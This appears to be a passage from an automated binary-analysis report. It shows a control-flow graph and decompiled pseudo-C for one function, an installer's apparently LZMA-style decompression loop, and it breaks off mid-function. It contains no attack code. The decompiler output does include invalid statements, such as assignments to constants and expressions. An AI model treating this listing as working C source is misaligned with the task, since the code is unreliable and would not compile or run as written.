                                      control_flow_graph 589 406d5f-406d64 590 406dd5-406df3 589->590 591 406d66-406d95 589->591 592 4073cb-4073e0 590->592 593 406d97-406d9a 591->593 594 406d9c-406da0 591->594 595 4073e2-4073f8 592->595 596 4073fa-407410 592->596 597 406dac-406daf 593->597 598 406da2-406da6 594->598 599 406da8 594->599 600 407413-40741a 595->600 596->600 601 406db1-406dba 597->601 602 406dcd-406dd0 597->602 598->597 599->597 606 407441-40744d 600->606 607 40741c-407420 600->607 603 406dbc 601->603 604 406dbf-406dcb 601->604 605 406fa2-406fc0 602->605 603->604 608 406e35-406e63 604->608 612 406fc2-406fd6 605->612 613 406fd8-406fea 605->613 615 406be3-406bec 606->615 609 407426-40743e 607->609 610 4075cf-4075d9 607->610 616 406e65-406e7d 608->616 617 406e7f-406e99 608->617 609->606 614 4075e5-4075f8 610->614 618 406fed-406ff7 612->618 613->618 622 4075fd-407601 614->622 619 406bf2 615->619 620 4075fa 615->620 621 406e9c-406ea6 616->621 617->621 623 406ff9 618->623 624 406f9a-406fa0 618->624 626 406bf9-406bfd 619->626 627 406d39-406d5a 619->627 628 406c9e-406ca2 619->628 629 406d0e-406d12 619->629 620->622 631 406eac 621->631 632 406e1d-406e23 621->632 640 407581-40758b 623->640 641 406f7f-406f97 623->641 624->605 630 406f3e-406f48 624->630 626->614 633 406c03-406c10 626->633 627->592 642 406ca8-406cc1 628->642 643 40754e-407558 628->643 634 406d18-406d2c 629->634 635 40755d-407567 629->635 636 40758d-407597 630->636 637 406f4e-407117 630->637 648 406e02-406e1a 631->648 649 407569-407573 631->649 638 406ed6-406edc 632->638 639 406e29-406e2f 632->639 633->620 647 406c16-406c5c 633->647 650 406d2f-406d37 634->650 635->614 636->614 637->615 645 406f3a 638->645 646 406ede-406efc 638->646 639->608 639->645 640->614 641->624 652 406cc4-406cc8 642->652 643->614 645->630 653 406f14-406f26 646->653 654 406efe-406f12 646->654 655 406c84-406c86 647->655 656 406c5e-406c62 647->656 648->632 649->614 650->627 650->629 652->628 657 406cca-406cd0 652->657 660 406f29-406f33 653->660 654->660 663 406c94-406c9c 655->663 664 406c88-406c92 655->664 661 406c64-406c67 GlobalFree 656->661 662 406c6d-406c7b GlobalAlloc 656->662 658 406cd2-406cd9 657->658 659 406cfa-406d0c 657->659 665 406ce4-406cf4 GlobalAlloc 658->665 666 406cdb-406cde GlobalFree 658->666 659->650 660->638 667 406f35 660->667 661->662 662->620 668 406c81 662->668 663->652 664->663 664->664 665->620 665->659 666->665 670 407575-40757f 667->670 671 406ebb-406ed3 667->671 668->655 670->614 671->638
                                      C-Code - Quality: 98%
                                      			E00406D5F() {
                                      				unsigned short _t531;
                                      				signed int _t532;
                                      				void _t533;
                                      				void* _t534;
                                      				signed int _t535;
                                      				signed int _t565;
                                      				signed int _t568;
                                      				signed int _t590;
                                      				signed int* _t607;
                                      				void* _t614;
                                      
                                      				L0:
                                      				while(1) {
                                      					L0:
                                      					if( *(_t614 - 0x40) != 0) {
                                      						 *(_t614 - 0x34) = 1;
                                      						 *(_t614 - 0x84) = 7;
                                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                      						L132:
                                      						 *(_t614 - 0x54) = _t607;
                                      						L133:
                                      						_t531 =  *_t607;
                                      						_t590 = _t531 & 0x0000ffff;
                                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                      						if( *(_t614 - 0xc) >= _t565) {
                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                      							 *(_t614 - 0x40) = 1;
                                      							_t532 = _t531 - (_t531 >> 5);
                                      							 *_t607 = _t532;
                                      						} else {
                                      							 *(_t614 - 0x10) = _t565;
                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                      						}
                                      						if( *(_t614 - 0x10) >= 0x1000000) {
                                      							L139:
                                      							_t533 =  *(_t614 - 0x84);
                                      							L140:
                                      							 *(_t614 - 0x88) = _t533;
                                      							goto L1;
                                      						} else {
                                      							L137:
                                      							if( *(_t614 - 0x6c) == 0) {
                                      								 *(_t614 - 0x88) = 5;
                                      								goto L170;
                                      							}
                                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                      							goto L139;
                                      						}
                                      					} else {
                                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                      						__esi =  *(__ebp - 0x60);
                                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                      						__ecx =  *(__ebp - 0x3c);
                                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                      						__ecx =  *(__ebp - 4);
                                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                      						if( *(__ebp - 0x38) >= 4) {
                                      							if( *(__ebp - 0x38) >= 0xa) {
                                      								_t97 = __ebp - 0x38;
                                      								 *_t97 =  *(__ebp - 0x38) - 6;
                                      							} else {
                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                      							}
                                      						} else {
                                      							 *(__ebp - 0x38) = 0;
                                      						}
                                      						if( *(__ebp - 0x34) == __edx) {
                                      							__ebx = 0;
                                      							__ebx = 1;
                                      							L60:
                                      							__eax =  *(__ebp - 0x58);
                                      							__edx = __ebx + __ebx;
                                      							__ecx =  *(__ebp - 0x10);
                                      							__esi = __edx + __eax;
                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                      							__ax =  *__esi;
                                      							 *(__ebp - 0x54) = __esi;
                                      							__edi = __ax & 0x0000ffff;
                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      							if( *(__ebp - 0xc) >= __ecx) {
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      								__cx = __ax;
                                      								_t216 = __edx + 1; // 0x1
                                      								__ebx = _t216;
                                      								__cx = __ax >> 5;
                                      								 *__esi = __ax;
                                      							} else {
                                      								 *(__ebp - 0x10) = __ecx;
                                      								0x800 = 0x800 - __edi;
                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      								__ebx = __ebx + __ebx;
                                      								 *__esi = __cx;
                                      							}
                                      							 *(__ebp - 0x44) = __ebx;
                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                      								L59:
                                      								if(__ebx >= 0x100) {
                                      									goto L54;
                                      								}
                                      								goto L60;
                                      							} else {
                                      								L57:
                                      								if( *(__ebp - 0x6c) == 0) {
                                      									 *(__ebp - 0x88) = 0xf;
                                      									goto L170;
                                      								}
                                      								__ecx =  *(__ebp - 0x70);
                                      								__eax =  *(__ebp - 0xc);
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      								_t202 = __ebp - 0x70;
                                      								 *_t202 =  *(__ebp - 0x70) + 1;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      								goto L59;
                                      							}
                                      						} else {
                                      							__eax =  *(__ebp - 0x14);
                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                      							if(__eax >=  *(__ebp - 0x74)) {
                                      								__eax = __eax +  *(__ebp - 0x74);
                                      							}
                                      							__ecx =  *(__ebp - 8);
                                      							__ebx = 0;
                                      							__ebx = 1;
                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                      							L40:
                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                      							__ecx =  *(__ebp - 0x58);
                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                      							 *(__ebp - 0x48) = __eax;
                                      							__eax = __eax + 1;
                                      							__eax = __eax << 8;
                                      							__eax = __eax + __ebx;
                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                      							__ax =  *__esi;
                                      							 *(__ebp - 0x54) = __esi;
                                      							__edx = __ax & 0x0000ffff;
                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                      							if( *(__ebp - 0xc) >= __ecx) {
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      								__cx = __ax;
                                      								 *(__ebp - 0x40) = 1;
                                      								__cx = __ax >> 5;
                                      								__ebx = __ebx + __ebx + 1;
                                      								 *__esi = __ax;
                                      							} else {
                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                      								 *(__ebp - 0x10) = __ecx;
                                      								0x800 = 0x800 - __edx;
                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                      								__ebx = __ebx + __ebx;
                                      								 *__esi = __cx;
                                      							}
                                      							 *(__ebp - 0x44) = __ebx;
                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                      								L38:
                                      								__eax =  *(__ebp - 0x40);
                                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                      									while(1) {
                                      										if(__ebx >= 0x100) {
                                      											break;
                                      										}
                                      										__eax =  *(__ebp - 0x58);
                                      										__edx = __ebx + __ebx;
                                      										__ecx =  *(__ebp - 0x10);
                                      										__esi = __edx + __eax;
                                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                                      										__ax =  *__esi;
                                      										 *(__ebp - 0x54) = __esi;
                                      										__edi = __ax & 0x0000ffff;
                                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                      										if( *(__ebp - 0xc) >= __ecx) {
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                      											__cx = __ax;
                                      											_t169 = __edx + 1; // 0x1
                                      											__ebx = _t169;
                                      											__cx = __ax >> 5;
                                      											 *__esi = __ax;
                                      										} else {
                                      											 *(__ebp - 0x10) = __ecx;
                                      											0x800 = 0x800 - __edi;
                                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                      											__ebx = __ebx + __ebx;
                                      											 *__esi = __cx;
                                      										}
                                      										 *(__ebp - 0x44) = __ebx;
                                      										if( *(__ebp - 0x10) < 0x1000000) {
                                      											L45:
                                      											if( *(__ebp - 0x6c) == 0) {
                                      												 *(__ebp - 0x88) = 0xe;
                                      												goto L170;
                                      											}
                                      											__ecx =  *(__ebp - 0x70);
                                      											__eax =  *(__ebp - 0xc);
                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      											_t155 = __ebp - 0x70;
                                      											 *_t155 =  *(__ebp - 0x70) + 1;
                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      										}
                                      									}
                                      									L53:
                                      									_t172 = __ebp - 0x34;
                                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                      									L54:
                                      									__al =  *(__ebp - 0x44);
                                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                      									L55:
                                      									if( *(__ebp - 0x64) == 0) {
                                      										 *(__ebp - 0x88) = 0x1a;
                                      										goto L170;
                                      									}
                                      									__ecx =  *(__ebp - 0x68);
                                      									__al =  *(__ebp - 0x5c);
                                      									__edx =  *(__ebp - 8);
                                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                      									 *( *(__ebp - 0x68)) = __al;
                                      									__ecx =  *(__ebp - 0x14);
                                      									 *(__ecx +  *(__ebp - 8)) = __al;
                                      									__eax = __ecx + 1;
                                      									__edx = 0;
                                      									_t191 = __eax %  *(__ebp - 0x74);
                                      									__eax = __eax /  *(__ebp - 0x74);
                                      									__edx = _t191;
                                      									L79:
                                      									 *(__ebp - 0x14) = __edx;
                                      									L80:
                                      									 *(__ebp - 0x88) = 2;
                                      									goto L1;
                                      								}
                                      								if(__ebx >= 0x100) {
                                      									goto L53;
                                      								}
                                      								goto L40;
                                      							} else {
                                      								L36:
                                      								if( *(__ebp - 0x6c) == 0) {
                                      									 *(__ebp - 0x88) = 0xd;
                                      									L170:
                                      									_t568 = 0x22;
                                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                      									_t535 = 0;
                                      									L172:
                                      									return _t535;
                                      								}
                                      								__ecx =  *(__ebp - 0x70);
                                      								__eax =  *(__ebp - 0xc);
                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      								_t121 = __ebp - 0x70;
                                      								 *_t121 =  *(__ebp - 0x70) + 1;
                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      								goto L38;
                                      							}
                                      						}
                                      					}
                                      					L1:
                                      					_t534 =  *(_t614 - 0x88);
                                      					if(_t534 > 0x1c) {
                                      						L171:
                                      						_t535 = _t534 | 0xffffffff;
                                      						goto L172;
                                      					}
                                      					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                      						case 0:
                                      							if( *(_t614 - 0x6c) == 0) {
                                      								goto L170;
                                      							}
                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                      							_t534 =  *( *(_t614 - 0x70));
                                      							if(_t534 > 0xe1) {
                                      								goto L171;
                                      							}
                                      							_t538 = _t534 & 0x000000ff;
                                      							_push(0x2d);
                                      							asm("cdq");
                                      							_pop(_t570);
                                      							_push(9);
                                      							_pop(_t571);
                                      							_t610 = _t538 / _t570;
                                      							_t540 = _t538 % _t570 & 0x000000ff;
                                      							asm("cdq");
                                      							_t605 = _t540 % _t571 & 0x000000ff;
                                      							 *(_t614 - 0x3c) = _t605;
                                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                      								L10:
                                      								if(_t613 == 0) {
                                      									L12:
                                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                      									goto L15;
                                      								} else {
                                      									goto L11;
                                      								}
                                      								do {
                                      									L11:
                                      									_t613 = _t613 - 1;
                                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                      								} while (_t613 != 0);
                                      								goto L12;
                                      							}
                                      							if( *(_t614 - 4) != 0) {
                                      								GlobalFree( *(_t614 - 4));
                                      							}
                                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                      							 *(_t614 - 4) = _t534;
                                      							if(_t534 == 0) {
                                      								goto L171;
                                      							} else {
                                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                      								goto L10;
                                      							}
                                      						case 1:
                                      							L13:
                                      							__eflags =  *(_t614 - 0x6c);
                                      							if( *(_t614 - 0x6c) == 0) {
                                      								 *(_t614 - 0x88) = 1;
                                      								goto L170;
                                      							}
                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                      							_t45 = _t614 - 0x48;
                                      							 *_t45 =  *(_t614 - 0x48) + 1;
                                      							__eflags =  *_t45;
                                      							L15:
                                      							if( *(_t614 - 0x48) < 4) {
                                      								goto L13;
                                      							}
                                      							_t546 =  *(_t614 - 0x40);
                                      							if(_t546 ==  *(_t614 - 0x74)) {
                                      								L20:
                                      								 *(_t614 - 0x48) = 5;
                                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                      								goto L23;
                                      							}
                                      							 *(_t614 - 0x74) = _t546;
                                      							if( *(_t614 - 8) != 0) {
                                      								GlobalFree( *(_t614 - 8));
                                      							}
                                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                      							 *(_t614 - 8) = _t534;
                                      							if(_t534 == 0) {
                                      								goto L171;
                                      							} else {
                                      								goto L20;
                                      							}
                                      						case 2:
                                      							L24:
                                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                      							 *(_t614 - 0x84) = 6;
                                      							 *(_t614 - 0x4c) = _t553;
                                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                      							goto L132;
                                      						case 3:
                                      							L21:
                                      							__eflags =  *(_t614 - 0x6c);
                                      							if( *(_t614 - 0x6c) == 0) {
                                      								 *(_t614 - 0x88) = 3;
                                      								goto L170;
                                      							}
                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                      							_t67 = _t614 - 0x70;
                                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                      							__eflags =  *_t67;
                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                      							L23:
                                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                      							if( *(_t614 - 0x48) != 0) {
                                      								goto L21;
                                      							}
                                      							goto L24;
                                      						case 4:
                                      							goto L133;
                                      						case 5:
                                      							goto L137;
                                      						case 6:
                                      							goto L0;
                                      						case 7:
                                      							__eflags =  *(__ebp - 0x40) - 1;
                                      							if( *(__ebp - 0x40) != 1) {
                                      								__eax =  *(__ebp - 0x24);
                                      								 *(__ebp - 0x80) = 0x16;
                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      								__eax =  *(__ebp - 0x28);
                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      								__eax =  *(__ebp - 0x2c);
                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      								__eax = 0;
                                      								__eflags =  *(__ebp - 0x38) - 7;
                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      								__al = __al & 0x000000fd;
                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                      								__eax =  *(__ebp - 4);
                                      								__eax =  *(__ebp - 4) + 0x664;
                                      								__eflags = __eax;
                                      								 *(__ebp - 0x58) = __eax;
                                      								goto L68;
                                      							}
                                      							__eax =  *(__ebp - 4);
                                      							__ecx =  *(__ebp - 0x38);
                                      							 *(__ebp - 0x84) = 8;
                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                      							goto L132;
                                      						case 8:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__eax =  *(__ebp - 4);
                                      								__ecx =  *(__ebp - 0x38);
                                      								 *(__ebp - 0x84) = 0xa;
                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                      							} else {
                                      								__eax =  *(__ebp - 0x38);
                                      								__ecx =  *(__ebp - 4);
                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                      								 *(__ebp - 0x84) = 9;
                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                      							}
                                      							goto L132;
                                      						case 9:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								goto L89;
                                      							}
                                      							__eflags =  *(__ebp - 0x60);
                                      							if( *(__ebp - 0x60) == 0) {
                                      								goto L171;
                                      							}
                                      							__eax = 0;
                                      							__eflags =  *(__ebp - 0x38) - 7;
                                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                      							__eflags = _t258;
                                      							0 | _t258 = _t258 + _t258 + 9;
                                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                      							goto L75;
                                      						case 0xa:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__eax =  *(__ebp - 4);
                                      								__ecx =  *(__ebp - 0x38);
                                      								 *(__ebp - 0x84) = 0xb;
                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                      								goto L132;
                                      							}
                                      							__eax =  *(__ebp - 0x28);
                                      							goto L88;
                                      						case 0xb:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__ecx =  *(__ebp - 0x24);
                                      								__eax =  *(__ebp - 0x20);
                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                      							} else {
                                      								__eax =  *(__ebp - 0x24);
                                      							}
                                      							__ecx =  *(__ebp - 0x28);
                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                      							L88:
                                      							__ecx =  *(__ebp - 0x2c);
                                      							 *(__ebp - 0x2c) = __eax;
                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                      							L89:
                                      							__eax =  *(__ebp - 4);
                                      							 *(__ebp - 0x80) = 0x15;
                                      							__eax =  *(__ebp - 4) + 0xa68;
                                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                      							goto L68;
                                      						case 0xc:
                                      							L99:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0xc;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t334 = __ebp - 0x70;
                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t334;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							__eax =  *(__ebp - 0x2c);
                                      							goto L101;
                                      						case 0xd:
                                      							goto L36;
                                      						case 0xe:
                                      							goto L45;
                                      						case 0xf:
                                      							goto L57;
                                      						case 0x10:
                                      							L109:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0x10;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							_t365 = __ebp - 0x70;
                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                      							__eflags =  *_t365;
                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                      							goto L111;
                                      						case 0x11:
                                      							L68:
                                      							__esi =  *(__ebp - 0x58);
                                      							 *(__ebp - 0x84) = 0x12;
                                      							goto L132;
                                      						case 0x12:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								__eax =  *(__ebp - 0x58);
                                      								 *(__ebp - 0x84) = 0x13;
                                      								__esi =  *(__ebp - 0x58) + 2;
                                      								goto L132;
                                      							}
                                      							__eax =  *(__ebp - 0x4c);
                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                      							__ecx =  *(__ebp - 0x58);
                                      							__eax =  *(__ebp - 0x4c) << 4;
                                      							__eflags = __eax;
                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                      							goto L130;
                                      						case 0x13:
                                      							__eflags =  *(__ebp - 0x40);
                                      							if( *(__ebp - 0x40) != 0) {
                                      								_t469 = __ebp - 0x58;
                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                      								__eflags =  *_t469;
                                      								 *(__ebp - 0x30) = 0x10;
                                      								 *(__ebp - 0x40) = 8;
                                      								L144:
                                      								 *(__ebp - 0x7c) = 0x14;
                                      								goto L145;
                                      							}
                                      							__eax =  *(__ebp - 0x4c);
                                      							__ecx =  *(__ebp - 0x58);
                                      							__eax =  *(__ebp - 0x4c) << 4;
                                      							 *(__ebp - 0x30) = 8;
                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                      							L130:
                                      							 *(__ebp - 0x58) = __eax;
                                      							 *(__ebp - 0x40) = 3;
                                      							goto L144;
                                      						case 0x14:
                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                      							__eax =  *(__ebp - 0x80);
                                      							goto L140;
                                      						case 0x15:
                                      							__eax = 0;
                                      							__eflags =  *(__ebp - 0x38) - 7;
                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                      							__al = __al & 0x000000fd;
                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                      							goto L120;
                                      						case 0x16:
                                      							__eax =  *(__ebp - 0x30);
                                      							__eflags = __eax - 4;
                                      							if(__eax >= 4) {
                                      								_push(3);
                                      								_pop(__eax);
                                      							}
                                      							__ecx =  *(__ebp - 4);
                                      							 *(__ebp - 0x40) = 6;
                                      							__eax = __eax << 7;
                                      							 *(__ebp - 0x7c) = 0x19;
                                      							 *(__ebp - 0x58) = __eax;
                                      							goto L145;
                                      						case 0x17:
                                      							L145:
                                      							__eax =  *(__ebp - 0x40);
                                      							 *(__ebp - 0x50) = 1;
                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                      							goto L149;
                                      						case 0x18:
                                      							L146:
                                      							__eflags =  *(__ebp - 0x6c);
                                      							if( *(__ebp - 0x6c) == 0) {
                                      								 *(__ebp - 0x88) = 0x18;
                                      								goto L170;
                                      							}
                                      							__ecx =  *(__ebp - 0x70);
                                      							__eax =  *(__ebp - 0xc);
                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
